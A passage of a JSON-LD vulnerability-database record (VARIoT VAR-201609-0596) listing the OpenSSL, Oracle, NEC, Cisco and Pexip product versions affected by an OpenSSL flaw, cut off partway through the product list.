Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201609-0596", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1e" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1i" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1b" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1g" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1d" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1a" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1h" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1q" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "7" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2f" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "6" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1s" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1t" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1r" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1p" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1n" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.1.0" }, { "model": "capssuite", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v3.0 to v4.0" }, { "model": "enterpriseidentitymanager", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "esmpro/serveragentservice", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "(linux edition )" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "sg3600 all series" }, { "model": "ix1000 series", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "ix2000 series", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "ix3000 series", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "enterprise v8.2 to v9.4" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "express v8.2 to v9.4" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "foundation v8.2 to v8.5" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "standard v8.2 to v9.4" }, { "model": "webotx portal", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.2 to v9.1" }, { "model": "paging server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "9.1" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "9" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "8.1" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "8" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "7" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "6" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "5" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "4" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "12.2" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "12.1" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "12" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "11.1" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "11" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "10.2" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "10.1" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "10" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.26" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.22" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.16" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.14" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.13" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.12" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.11" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.10" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.9" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.8" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.18" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.3" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.2" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.71" }, { "model": "oss support tools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.9.15.9.8" }, { "model": "oss support tools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.8.15.7.15" }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.3.8" }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1.5" }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1.4" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.15" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.14" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.13" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.12" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.9" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.8" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.7" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.6" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.5" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.4" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.3" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.2" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.33" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.32" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.31" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.30" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.28" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.27" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.26" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.25" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.24" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.23" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.22" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.21" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.17" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.12" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.11" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.10" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.9" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.6" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.11" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.10" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.8" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.7" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.5" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.4" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.29" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.20" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.2" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.19" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.18" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.16" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.15" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.14" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.13" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.3.2" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.2.2" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.4" }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1" }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.2.0.0" }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.1.0.0" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.2" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.1" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.3" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2.2" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.4.1.2" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.2" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.1" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.3" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2.2" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.4.1.2" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.2.1.3.0" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.2.1.2.0" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.1.9.0" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.1.7.0" }, { "model": "api gateway", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.2.4.0" }, { "model": "access manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10.1.4.3.0" }, { "model": "project openssl 1.0.0h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0" }, { "model": "project openssl 0.9.8u", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.11" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.2" }, { "model": "project openssl beta1", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "project openssl beta3", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "project openssl beta2", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "project openssl beta1", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl m", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl l", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl g", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl beta3", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl beta2", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl beta1", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl m", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "project openssl l", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "project openssl g", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "project openssl b-36.8", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.5" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.5" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.4" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.3" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.2" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.1" }, { "model": "project openssl 1.0.2i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl beta1", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.2" }, { "model": "project openssl 1.0.1u", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl beta3", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "project openssl beta2", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.0x" }, { "model": "project openssl 1.0.0t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl beta5", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.0" }, { "model": "project openssl beta4", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.0" }, { "model": "project openssl 0.9.8zh", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8zg", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8zf", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8ze", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8zd", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8zc", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8zb", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8za", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8y", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8x" }, { "model": "project openssl 0.9.8w", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8m beta1", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8f", "scope": null, "trust": 0.3, 